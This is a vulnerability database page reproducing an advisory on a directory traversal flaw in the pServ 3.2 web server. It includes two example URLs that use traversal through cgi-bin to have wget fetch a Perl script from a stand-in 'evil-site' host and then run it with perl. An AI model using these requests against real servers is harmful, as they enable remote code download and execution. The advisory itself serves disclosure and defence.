Vulners
Lucene search
pserv 3.2 - Directory Traversal vulnerability
source: http://www.securityfocus.com/bid/13642/info
pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.
This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable.
The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1